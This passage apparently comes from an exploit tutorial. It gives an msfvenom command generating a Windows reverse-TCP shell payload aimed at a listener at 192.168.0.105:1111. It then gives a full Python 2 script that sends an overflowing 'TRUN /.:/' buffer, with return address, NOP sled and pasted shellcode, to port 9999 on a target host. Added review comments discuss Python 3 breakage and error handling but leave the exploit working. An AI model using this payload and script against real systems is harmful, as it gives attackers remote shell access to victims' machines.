In order to generate the shellcode, we are again going to use a Metasploit-powered tool called msfvenom.
$ msfvenom -p windows/shell_reverse_tcp LHOST=192.168.0.105 LPORT=1111 EXITFUNC=thread -f c -a x86 -b "\0x00" > payload
#!/usr/bin/python
import sys, socket

# NOTE(review): this is Python 2 code. `s.send()` below is handed a str; on
# Python 3 that raises TypeError (socket.send requires bytes), and a str literal
# such as "\xbf" would be a code point rather than a raw byte, so the buffer
# would not be sent as written.

# Payload bytes as emitted by the msfvenom command above (`-f c` output pasted
# as adjacent Python string literals, which the parser joins into one string).
overflow = ("\xbf\xe1\xed\x78\xbb\xdd\xc2\xd9\x74\x24\xf4\x5d\x2b\xc9"
"\xb1\x52\x83\xed\xfc\x31\x7d\x0e\x03\x9c\xe3\x9a\x4e\xa2"
"\x14\xd8\xb1\x5a\xe5\xbd\x38\xbf\xd4\xfd\x5f\xb4\x47\xce"
"\x14\x98\x6b\xa5\x79\x08\xff\xcb\x55\x3f\x48\x61\x80\x0e"
"\x49\xda\xf0\x11\xc9\x21\x25\xf1\xf0\xe9\x38\xf0\x35\x17"
"\xb0\xa0\xee\x53\x67\x54\x9a\x2e\xb4\xdf\xd0\xbf\xbc\x3c"
"\xa0\xbe\xed\x93\xba\x98\x2d\x12\x6e\x91\x67\x0c\x73\x9c"
"\x3e\xa7\x47\x6a\xc1\x61\x96\x93\x6e\x4c\x16\x66\x6e\x89"
"\x91\x99\x05\xe3\xe1\x24\x1e\x30\x9b\xf2\xab\xa2\x3b\x70"
"\x0b\x0e\xbd\x55\xca\xc5\xb1\x12\x98\x81\xd5\xa5\x4d\xba"
"\xe2\x2e\x70\x6c\x63\x74\x57\xa8\x2f\x2e\xf6\xe9\x95\x81"
"\x07\xe9\x75\x7d\xa2\x62\x9b\x6a\xdf\x29\xf4\x5f\xd2\xd1"
"\x04\xc8\x65\xa2\x36\x57\xde\x2c\x7b\x10\xf8\xab\x7c\x0b"
"\xbc\x23\x83\xb4\xbd\x6a\x40\xe0\xed\x04\x61\x89\x65\xd4"
"\x8e\x5c\x29\x84\x20\x0f\x8a\x74\x81\xff\x62\x9e\x0e\xdf"
"\x93\xa1\xc4\x48\x39\x58\x8f\xb6\x16\x62\x26\x5f\x65\x62"
"\xb9\x24\xe0\x84\xd3\x4a\xa5\x1f\x4c\xf2\xec\xeb\xed\xfb"
"\x3a\x96\x2e\x77\xc9\x67\xe0\x70\xa4\x7b\x95\x70\xf3\x21"
"\x30\x8e\x29\x4d\xde\x1d\xb6\x8d\xa9\x3d\x61\xda\xfe\xf0"
"\x78\x8e\x12\xaa\xd2\xac\xee\x2a\x1c\x74\x35\x8f\xa3\x75"
"\xb8\xab\x87\x65\x04\x33\x8c\xd1\xd8\x62\x5a\x8f\x9e\xdc"
"\x2c\x79\x49\xb2\xe6\xed\x0c\xf8\x38\x6b\x11\xd5\xce\x93"
"\xa0\x80\x96\xac\x0d\x45\x1f\xd5\x73\xf5\xe0\x0c\x30\x15"
"\x03\x84\x4d\xbe\x9a\x4d\xec\xa3\x1c\xb8\x33\xda\x9e\x48"
"\xcc\x19\xbe\x39\xc9\x66\x78\xd2\xa3\xf7\xed\xd4\x10\xf7"
"\x27")

# Buffer layout: 2003 filler bytes, then 4 literal bytes (presumably the
# little-endian return-address overwrite — its origin is not shown on this
# page, confirm against the preceding steps), then 32 x 0x90 (x86 NOP) bytes,
# then the payload above.
shellcode = "A" * 2003 + "\xaf\x11\x50\x62" + "\x90" * 32 + overflow

# One plaintext TCP send of the "TRUN /.:/" command with an oversized argument;
# nothing is read back, so the script cannot tell whether the peer accepted it.
# From a monitoring standpoint, that oversized argument on port 9999 is the
# whole observable footprint of this script.
try:
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.connect(('192.168.0.104',9999))
    s.send(('TRUN /.:/' + shellcode))
    s.close()
except:
    # NOTE(review): bare `except:` catches everything (SystemExit and
    # KeyboardInterrupt included) and prints one generic message, so a refused
    # connection, a timeout and a Python 3 TypeError from sending a str are
    # indistinguishable. The socket is also never closed on this path.
    print("Error !")
    sys.exit()